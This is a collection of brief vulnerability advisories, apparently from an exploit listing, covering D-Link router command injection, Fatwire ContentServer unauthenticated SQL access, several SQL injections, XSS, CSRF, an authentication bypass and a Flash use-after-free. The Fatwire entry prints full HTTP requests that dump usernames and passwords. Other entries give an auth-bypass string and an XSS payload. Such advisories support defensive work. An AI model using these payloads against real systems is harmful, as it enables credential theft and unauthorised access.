This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices. Vulnerability can be exploited through 'cli' parameter that is directly used to invoke 'ayecli' binary. Vulnerable firmwares are from 1.01 up to 1.03.
It has been discovered that there is an incorrect access control over several resources in previous versions of Fatwire (confirmed FutureTenseContentServer 5.5.2 ,7.5) that allow the sending of SQL queries and query the tables and database schema without authentication. PoC : Improper Access Control PAYLOAD : SQL query POST /cs/Satellite HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 98 tbl=AArticles&query=select+username%2Cpassword+from+systemusers&pagename=Support%2FVerify%2Fexport PAYLOAD : show all table database https://www.example.com/cs/Satellite?pagename=Support/Verify/tablelistHTML https://www.example.com/cs/Satellite?pagename=Support/CacheManager/FlushTables&cmd=null OR request POST /cs/Satellite HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 98 pagename=Support/Verify/tablelistHTML PAYLOAD : URL list ID installed Site https://www.example.com/cs/Satellite?pagename=OpenMarket/Demos/index
When an unauthenticated user navigates through the application, the application assigns a cookie, that cookie is assigned in the parameter ~ session, therefore it could be possible for an attacker to fix the fallo ~ session through a request GET. This, together with the fact that the parameter SERVICEUNIQUE has a parameter validation failure, results in a single-use XSS, since the session expires once the method of the request is exchanged and fixed in the URL.
The vulnerability allows an attacker to inject sql commands from the user search section with 'my_item_search' parameter.
An authentication bypass vulnerability exists in EU MRV Regulatory Complete Solution 1, which allows an attacker to bypass authentication by entering '=''or' as the username and password.
A Cross-Site Scripting (XSS) vulnerability exists in Honeywell XL Web Controller due to improper validation of user-supplied input. An attacker can exploit this vulnerability to inject malicious script code into the application, which will be executed in the context of the user's browser. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
A Cross Site Request Forgery (CSRF) vulnerability exists in Timber - Ultimate Freelancer Platform 1.1, which allows an attacker to perform malicious actions on behalf of the authenticated user. An attacker can craft a malicious HTML page that contains a form with pre-filled values and submit it to the vulnerable application. This can be used to update the user profile with malicious values.
The vulnerability allows an attacker to inject sql commands from the search section with 'keyword' parameter. An attacker can use the GET or POST methods to exploit the vulnerability. The payloads for SQLi are boolean-based blind, error-based and AND/OR time-based blind. The payload for XSS is <script>alert(1)</script>
CVE-2015-5112 is a vulnerability in Adobe Flash Player 18.0.0.194 and earlier versions. It allows an attacker to execute arbitrary code on the target system by exploiting a use-after-free vulnerability in the ActionScript 3 (AS3) virtual machine. The vulnerability is triggered when a maliciously crafted SWF file is loaded by the vulnerable Flash Player.
The vulnerability allows an attacker to inject sql commands from the search section with 'query' parameter. You can use the GET or POST methods. The vulnerable payloads are AND boolean-based blind - WHERE or HAVING clause and Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN).
Services By CQR